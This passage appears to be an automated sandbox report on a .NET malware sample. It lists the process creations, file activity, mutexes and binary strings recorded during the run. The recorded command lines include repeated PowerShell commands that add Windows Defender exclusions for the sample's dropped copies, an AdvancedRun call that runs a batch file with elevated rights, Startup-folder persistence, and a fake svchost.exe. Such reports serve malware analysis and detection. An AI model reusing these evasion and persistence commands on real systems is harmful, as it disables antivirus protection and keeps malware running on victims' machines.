                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 7_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499fJump to behavior
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exeCode function: 6_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2244
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
                      Source: VknMvPoCXZ.exe, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 481F404B.exe.1.dr, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: svchost.exe.1.dr, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.13.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.15.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.0.VknMvPoCXZ.exe.200000.1.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.481F404B.exe.a50000.0.unpack, u0039BD3B5D7/u00364733196.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: VknMvPoCXZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: VknMvPoCXZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: VknMvPoCXZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002udio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: osymbols\dll\System.Windows.Forms.pdbvH source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.PDBm source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbPROCESSOR_ARCHITEW6432=AMD64 source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe
                      Source: Binary string: ndel\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb9- source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: ease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb1 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files\??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe\??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbUSERDOMAIN=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbE> source: VknMvPoCXZ.exe, 00000001.00000000.400279978.0000000000AD8000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb,U}< source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb@ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb\aero\Shell\4B6A7152\svch source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: ; .pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.508463732.0000000006E40000.00000004.00000001.sdmp
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.DevOps.Telemetry.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbCOMPUTERNAME=computer source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb+ source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb* source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: lib.pdb source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: E:\A\_work\3592\s\out\Release\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdb9C-4437-8B11-F424491E3931}\Server source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbDriverData=C:\Windows\System32\Drivers\DriverData source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb(m source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbs source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
